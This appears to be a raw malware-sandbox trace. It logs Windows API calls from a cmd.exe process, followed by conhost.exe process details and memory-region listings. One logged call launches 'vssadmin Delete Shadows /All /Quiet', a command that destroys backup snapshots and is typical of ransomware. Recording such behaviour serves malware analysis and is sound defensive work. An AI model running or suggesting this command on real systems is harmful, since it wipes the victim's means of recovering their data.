	[0244.422] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xe0) returned 0x4639500
	[0244.585] GetProcessHeap () returned 0x4630000
	[0244.585] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x4639500, Size=0x76) returned 0x4639500
	[0244.585] GetProcessHeap () returned 0x4630000
	[0244.585] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x4639500) returned 0x76
	[0244.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0244.587] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f248) returned 0xffffffff
	[0244.588] GetLastError () returned 0x2
	[0244.588] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0244.588] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f248) returned 0xffffffff
	[0244.589] GetLastError () returned 0x2
	[0244.589] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0244.590] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f248) returned 0x4639580
	[0244.590] GetProcessHeap () returned 0x4630000
	[0244.590] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x0, Size=0x14) returned 0x46378d8
	[0244.590] FindClose (in: hFindFile=0x4639580 | out: hFindFile=0x4639580) returned 1
	[0244.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f248) returned 0xffffffff
	[0244.591] GetLastError () returned 0x2
	[0244.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f248) returned 0x4639580
	[0244.591] GetProcessHeap () returned 0x4630000
	[0244.591] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x46378d8, Size=0x4) returned 0x4634260
	[0244.591] FindClose (in: hFindFile=0x4639580 | out: hFindFile=0x4639580) returned 1
	[0244.592] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0244.592] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0244.592] GetConsoleTitleW (in: lpConsoleTitle=0x18f73c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0244.724] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f668, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f64c | out: lpAttributeList=0x18f668, lpSize=0x18f64c) returned 1
	[0244.724] UpdateProcThreadAttribute (in: lpAttributeList=0x18f668, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f654, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f668, lpPreviousValue=0x0) returned 1
	[0244.724] GetStartupInfoW (in: lpStartupInfo=0x18f6a0 | out: lpStartupInfo=0x18f6a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0244.724] GetProcessHeap () returned 0x4630000
	[0244.724] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x18) returned 0x4637898
	[0244.724] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0244.724] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0244.724] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0244.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0244.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0244.727] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0244.727] GetProcessHeap () returned 0x4630000
	[0244.727] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x4637898) returned 1
	[0244.727] GetProcessHeap () returned 0x4630000
	[0244.727] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xa) returned 0x4639580
	[0244.728] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0244.734] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=T: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f5f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=T: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f63c | out: lpCommandLine="vssadmin  Delete Shadows /For=T: /All /Quiet ", lpProcessInformation=0x18f63c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1040, dwThreadId=0x105c)) returned 1
	[0244.784] CloseHandle (hObject=0xa4) returned 1
	[0244.784] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0244.784] GetProcessHeap () returned 0x4630000
	[0244.784] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463ad38) returned 1
	[0244.784] GetEnvironmentStringsW () returned 0x463a190*
	[0244.784] GetProcessHeap () returned 0x4630000
	[0244.784] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xb9c) returned 0x463ad38
	[0244.784] memcpy (in: _Dst=0x463ad38, _Src=0x463a190, _Size=0xb9c | out: _Dst=0x463ad38) returned 0x463ad38
	[0244.784] FreeEnvironmentStringsA (penv="=") returned 1
	[0244.785] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0261.006] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f5d4 | out: lpExitCode=0x18f5d4*=0x2) returned 1
	[0261.007] CloseHandle (hObject=0xa8) returned 1
	[0261.008] _vsnwprintf (in: _Buffer=0x18f6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f5dc | out: _Buffer="00000002") returned 8
	[0261.009] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0261.010] GetProcessHeap () returned 0x4630000
	[0261.010] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463ad38) returned 1
	[0261.010] GetEnvironmentStringsW () returned 0x463a190*
	[0261.011] GetProcessHeap () returned 0x4630000
	[0261.011] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xbc2) returned 0x463c4b0
	[0261.011] memcpy (in: _Dst=0x463c4b0, _Src=0x463a190, _Size=0xbc2 | out: _Dst=0x463c4b0) returned 0x463c4b0
	[0261.012] FreeEnvironmentStringsA (penv="=") returned 1
	[0261.012] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0261.012] GetProcessHeap () returned 0x4630000
	[0261.012] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463c4b0) returned 1
	[0261.012] GetEnvironmentStringsW () returned 0x463a190*
	[0261.012] GetProcessHeap () returned 0x4630000
	[0261.012] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xbc2) returned 0x463c4b0
	[0261.012] memcpy (in: _Dst=0x463c4b0, _Src=0x463a190, _Size=0xbc2 | out: _Dst=0x463c4b0) returned 0x463c4b0
	[0261.012] FreeEnvironmentStringsA (penv="=") returned 1
	[0261.013] GetProcessHeap () returned 0x4630000
	[0261.013] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x4639580) returned 1
	[0261.013] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f668 | out: lpAttributeList=0x18f668) 
	[0261.013] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0261.013] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0261.184] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0261.184] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0261.265] _get_osfhandle (_FileHandle=0) returned 0x38
	[0261.265] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0261.293] SetConsoleInputExeNameW () returned 0x1
	[0261.293] GetConsoleOutputCP () returned 0x1b5
	[0261.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0261.422] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0261.970] exit (_Code=2) 

Thread:
	id = 87
	os_tid = 0x10dc


Process:
	id = "20"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x31740000"
	os_pid = "0xfb0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "19"
	os_parent_pid = "0xf68"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1404
	        start_va = 0x35000000
	          end_va = 0x351fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000035000000"
	        filename = ""

Region:
	              id = 1405
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1406
	        start_va = 0x7ab4eb0000
	          end_va = 0x7ab4eeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000007ab4eb0000"
	        filename = ""

Region:
	              id = 1407
	        start_va = 0x7ab5000000
	          end_va = 0x7ab51fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000007ab5000000"
	        filename = ""

Region:
	              id = 1408
	        start_va = 0x25f94f60000
	          end_va = 0x25f94f7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f94f60000"
	        filename = ""

Region:
	              id = 1409
	        start_va = 0x25f94f80000
	          end_va = 0x25f94f94fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f94f80000"
	        filename = ""

Region:
	              id = 1410
	        start_va = 0x7df5ff9a0000
	          end_va = 0x7ff5ff99ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff9a0000"
	        filename = ""

Region:
	              id = 1411
	        start_va = 0x7ff7fefd0000
	          end_va = 0x7ff7feff2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fefd0000"
	        filename = ""

Region:
	              id = 1412
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 1413
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1414
	        start_va = 0x25f94fa0000
	          end_va = 0x25f9525ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f94fa0000"
	        filename = ""

Region:
	              id = 1415
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1418
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1419
	        start_va = 0x25f94f60000
	          end_va = 0x25f94f6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f94f60000"
	        filename = ""

Region:
	              id = 1420
	        start_va = 0x7ff7feed0000
	          end_va = 0x7ff7fefcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7feed0000"
	        filename = ""

Region:
	              id = 1421
	        start_va = 0x25f94fa0000
	          end_va = 0x25f9505dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1422
	        start_va = 0x25f95160000
	          end_va = 0x25f9525ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95160000"
	        filename = ""

Region:
	              id = 1423
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1426
	        start_va = 0x7ab4ef0000
	          end_va = 0x7ab4f2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000007ab4ef0000"
	        filename = ""

Region:
	              id = 1427
	        start_va = 0x25f95060000
	          end_va = 0x25f9512ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95060000"
	        filename = ""

Region:
	              id = 1428
	        start_va = 0x25f94f70000
	          end_va = 0x25f94f76fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f94f70000"
	        filename = ""

Region:
	              id = 1429
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 1430
	        start_va = 0x25f95060000
	          end_va = 0x25f95060fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f95060000"
	        filename = ""

Region:
	              id = 1431
	        start_va = 0x25f95120000
	          end_va = 0x25f9512ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95120000"
	        filename = ""

Region:
	              id = 1432
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1433
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1434
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1435
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1436
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1437
	        start_va = 0x25f95070000
	          end_va = 0x25f95076fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95070000"
	        filename = ""

Region:
	              id = 1438
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1448
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1449
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1450
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1451
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1475
	        start_va = 0x25f95080000
	          end_va = 0x25f95080fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95080000"
	        filename = ""

Region:
	              id = 1476
	        start_va = 0x25f95090000
	          end_va = 0x25f95090fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f95090000"
	        filename = ""

Region:
	              id = 1477
	        start_va = 0x25f95260000
	          end_va = 0x25f953e7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f95260000"
	        filename = ""

Region:
	              id = 1478
	        start_va = 0x25f953f0000
	          end_va = 0x25f95570fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f953f0000"
	        filename = ""

Region:
	              id = 1479
	        start_va = 0x25f95580000
	          end_va = 0x25f9697ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f95580000"
	        filename = ""

Region:
	              id = 1480
	        start_va = 0x25f96980000
	          end_va = 0x25f96a0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f96980000"
	        filename = ""

Region:
	              id = 1491
	        start_va = 0x7ab4f30000
	          end_va = 0x7ab4f6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000007ab4f30000"
	        filename = ""

Region:
	              id = 1492
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1493
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1494
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1500
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1501
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1502
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1503
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1504
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1505
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1506
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1507
	        start_va = 0x25f96a10000
	          end_va = 0x25f96beffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f96a10000"
	        filename = ""

Region:
	              id = 1543
	        start_va = 0x25f96bf0000
	          end_va = 0x25f96f26fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1544
	        start_va = 0x25f950a0000
	          end_va = 0x25f950f9fff
	       monitored = 1
	     entry_point = 0x25f950b53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1545
	        start_va = 0x25f95130000
	          end_va = 0x25f95150fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1570
	        start_va = 0x25f96f30000
	          end_va = 0x25f9714efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f96f30000"
